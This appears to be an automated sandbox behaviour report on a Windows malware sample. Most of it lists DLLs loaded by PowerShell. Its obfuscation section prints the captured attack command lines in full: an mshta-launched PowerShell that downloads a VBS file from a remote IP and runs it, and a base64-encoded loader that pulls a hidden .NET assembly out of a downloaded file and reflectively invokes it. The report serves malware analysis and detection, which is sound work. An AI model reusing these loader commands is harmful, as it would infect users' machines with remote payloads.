          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1703698894.000000000755E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbP source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.pdb source: powershell.exe, 00000001.00000002.1811106062.00000000049F8000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.pdbJ source: powershell.exe, 00000009.00000002.1816997416.0000000003488000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B5F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbRgx source: powershell.exe, 00000003.00000002.1705324938.000000000847D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 00000009.00000002.1843718646.0000000008B50000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.1816997416.00000000034B4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdb source: powershell.exe, 00000009.00000002.1840311611.0000000007B14000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, Dfwdesativado
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Reversed);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI');$vaiMethod.Invoke($null, @('txt.RTCCCRV/622/512.821.
          Obfuscated command line found
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')"Jump to behavior
          PowerShell case anomaly found
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"Jump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWV